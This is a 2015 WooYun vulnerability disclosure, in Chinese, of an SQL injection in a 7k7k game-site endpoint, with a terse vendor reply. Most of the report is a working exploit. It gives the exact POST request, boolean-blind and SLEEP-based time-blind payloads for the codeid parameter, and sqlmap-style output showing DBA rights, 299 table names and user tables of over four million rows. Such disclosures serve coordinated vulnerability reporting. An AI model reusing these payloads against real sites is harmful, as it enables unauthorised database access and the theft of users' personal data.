当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122280

漏洞标题:奇客星空某站SQL注射涉及400多万用户数据DBA权限

相关厂商:奇客星空

漏洞作者: 紫霞仙子

提交时间:2015-06-23 14:32

修复时间:2015-08-07 14:44

公开时间:2015-08-07 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

233

详细说明:

POST /games/huodong/touch/20140516/userinfo.php HTTP/1.1
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://web.7k7k.com
Cookie:
Host: web.7k7k.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
act=ok&addr=3137%20Laguna%20Street&codeid=a&mailnum=sample%40email.tst&tel=555-666-0606&truename=wgbydocx&typeid=

漏洞证明:

---
Parameter: codeid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: act=ok&addr=3137 Laguna Street&codeid=-3469 OR 9133=9133&mailnum=sample@email.tst&tel=555-666-0606&truename=wgbydocx&typeid=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=ok&addr=3137 Laguna Street&codeid=a AND (SELECT * FROM (SELECT(SLEEP(5)))KHbg)&mailnum=sample@email.tst&tel=555-666-0606&truename=wgbydocx&typeid=
---
web application technology: Apache, PHP 5.3.6
back-end DBMS: MySQL 5.0.12
current user: '7k7klianyun@192.168.11.19'
current user is DBA: True
available databases [2]:
[*] information_schema
[*] web7k
Database: web7k
[299 tables]
+--------------------------+
| admin_menu |
| admin_user |
| admin_user_role |
| baidu_keywordid |
| baidu_keywordid_days |
| baidu_sync_log |
| baidu_union |
| baidu_wm_days |
| gs_admin |
| gs_admin_group |
| gs_admin_menu |
| gs_charge |
| gs_charge_info |
| keyword |
| keywordid_week |
| kk_card_detail |
| kk_dealer |
| level_award |
| sogou_keywordid_days |
| sogou_sync_log |
| stat_adv_total |
| stat_money_log |
| stat_plan_category |
| testforid |
| uc_265g |
| uc_7k7kb |
| uc_7kblogs |
| uc_7kcharge |
| uc_addnum |
| uc_admin_logs |
| uc_adminlog |
| uc_adusers |
| uc_adv_category |
| uc_advert |
| uc_ahsgchoujiang |
| uc_ahsghd |
| uc_amtcount |
| uc_antecode |
| uc_antevote |
| uc_article |
| uc_asztchoujiang |
| uc_authogroup |
| uc_authority |
| uc_authormenu |
| uc_base |
| uc_binduser |
| uc_bulian |
| uc_buykk |
| uc_cardpay |
| uc_charge |
| uc_charge2011 |
| uc_charge_kkm |
| uc_chargeadduser |
| uc_chargefrom |
| uc_chargesale |
| uc_chengzi |
| uc_city |
| uc_class |
| uc_code |
| uc_codecate |
| uc_contactkf |
| uc_coop |
| uc_cps_account |
| uc_cps_confirm |
| uc_cps_rate |
| uc_cps_subuser |
| uc_cpskou |
| uc_cpslist |
| uc_cpssite |
| uc_cpsuser |
| uc_cqbyhd |
| uc_cqbynumber |
| uc_csbhchoujiang |
| uc_csbhhd |
| uc_csbhhdqd |
| uc_csbhma |
| uc_csbhrecord |
| uc_ddtchoujiang |
| uc_demouser |
| uc_dlqhd |
| uc_docochoujiang |
| uc_docohd |
| uc_downact |
| uc_downloads |
| uc_factions |
| uc_fcm |
| uc_fours |
| uc_fuchi |
| uc_gamecode |
| uc_gamecodeqxz |
| uc_gameindex |
| uc_games |
| uc_getaszt |
| uc_gethzw |
| uc_getuser |
| uc_gwactive |
| uc_hdlog |
| uc_hits |
| uc_hits_hours |
| uc_hzwchoujiang3 |
| uc_hzwhd01 |
| uc_hzwhd03 |
| uc_hzwquestion |
| uc_indexshow |
| uc_information |
| uc_integral_log |
| uc_jinjiang |
| uc_jjsgchoujiang |
| uc_jjsghd |
| uc_kanswer |
| uc_kdxyma |
| uc_kefu_question |
| uc_kefu_question_rookie |
| uc_kefu_rookie |
| uc_kefu_rookie_answer |
| uc_kefu_rookie_sh |
| uc_kefu_rookie_sh_answer |
| uc_kefu_vip |
| uc_kefu_vip_answer |
| uc_kkhuodong |
| uc_kkmao |
| uc_kquestion |
| uc_ktpd2choujiang |
| uc_ktpd2hd |
| uc_leftserverlist |
| uc_levelcharge |
| uc_levelset |
| uc_lhzschoujiang |
| uc_lhzschoujiang2 |
| uc_lhzshd |
| uc_lhzshd2 |
| uc_lhzsmtk |
| uc_loginlog |
| uc_makeReg |
| uc_makeWDReg |
| uc_mediabelong |
| uc_mediakeywords |
| uc_mediapic |
| uc_mgames |
| uc_mhit |
| uc_mthreads |
| uc_nc |
| uc_nslmchoujiang |
| uc_nslmhd |
| uc_other |
| uc_package |
| uc_package_code |
| uc_pageshow |
| uc_passlogs |
| uc_paypal |
| uc_paypalcharge |
| uc_pf |
| uc_pkddt |
| uc_pkddtuser |
| uc_pksupport |
| uc_playgame |
| uc_points |
| uc_points_record |
| uc_polling |
| uc_polls |
| uc_pwdappeal |
| uc_qq |
| uc_question |
| uc_qxzchoujiang |
| uc_qxzhd |
| uc_regFour |
| uc_sctxchoujiang |
| uc_sctxhd |
| uc_seoset |
| uc_servers |
| uc_settlement |
| uc_sign |
| uc_site |
| uc_sitepos |
| uc_sjsgchoujiang |
| uc_sjsghd |
| uc_smallpic |
| uc_sq_tuijiangame |
| uc_sqchoujiang |
| uc_sqhd |
| uc_sssghd |
| uc_subinfo |
| uc_sw |
| uc_swhours |
| uc_tg360 |
| uc_tgarticle |
| uc_tgbdnew |
| uc_tgcategory |
| uc_tgconfig |
| uc_tghao123 |
| uc_tghao123new |
| uc_tghao4 |
| uc_tghao5 |
| uc_tgmedia_image |
| uc_tgmedia_size |
| uc_tgmedia_type |
| uc_tgpage |
| uc_tgpage2 |
| uc_tgpage2345 |
| uc_tgpagehao123 |
| uc_tgpagehao123bak |
| uc_tgreg_page |
| uc_tgsgnew |
| uc_tgslides |
| uc_tgsynew |
| uc_tgxfnew |
| uc_threads |
| uc_tjaid |
| uc_tjaid2012 |
| uc_tjcount |
| uc_tjcpskou |
| uc_tjday |
| uc_tjdayold |
| uc_tjfrom |
| uc_tjgame |
| uc_tjhours |
| uc_tjmonthcount |
| uc_tjwdday |
| uc_tmpuser |
| uc_totalPay2011 |
| uc_totalPay2012 |
| uc_touchchoujiang |
| uc_touchfztp |
| uc_touchfztppl |
| uc_touchhd |
| uc_touchinfo |
| uc_touchpiao |
| uc_touchsign |
| uc_touchypcj |
| uc_touchypcj_tp |
| uc_union_day |
| uc_union_hours |
| uc_upload |
| uc_upload1 |
| uc_user0 |
| uc_user1 |
| uc_user10 |
| uc_user11 |
| uc_user12 |
| uc_user13 |
| uc_user14 |
| uc_user15 |
| uc_user16 |
| uc_user17 |
| uc_user18 |
| uc_user19 |
| uc_user2 |
| uc_user20 |
| uc_user21 |
| uc_user22 |
| uc_user23 |
| uc_user24 |
| uc_user25 |
| uc_user26 |
| uc_user27 |
| uc_user28 |
| uc_user29 |
| uc_user3 |
| uc_user30 |
| uc_user31 |
| uc_user32 |
| uc_user33 |
| uc_user34 |
| uc_user35 |
| uc_user36 |
| uc_user37 |
| uc_user38 |
| uc_user39 |
| uc_user4 |
| uc_user40 |
| uc_user41 |
| uc_user42 |
| uc_user43 |
| uc_user44 |
| uc_user45 |
| uc_user46 |
| uc_user47 |
| uc_user48 |
| uc_user49 |
| uc_user5 |
| uc_user6 |
| uc_user7 |
| uc_user8 |
| uc_user9 |
| uc_userlog
| uc_vip |
| uc_vip_users |
| uc_vipuser |
| uc_wbcs |
| uc_webmaster |
| uc_wltemp |
| uc_wycqpwd |
| uc_xinshu |
| uc_xinshu_bzzr |
| uc_xinshu_cqby |
| uc_xinshu_login |
| uc_xinshu_mycs |
| uc_xinshu_rxtl |
| uc_zhixiao |
+--------------------------+
Database: web7k
+--------------+---------+
| Table | Entries |
+--------------+---------+
| uc_vip_users | 65420 |
+--------------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user1 | 4279108 |
+----------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user7 | 4273494 |
+----------+---------+

修复方案:

~~~求20rank

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-23 14:43

厂商回复:

有点创意吗? 标题能不包含400万吗? 你说给20rank我就给20啊?

最新状态:

暂无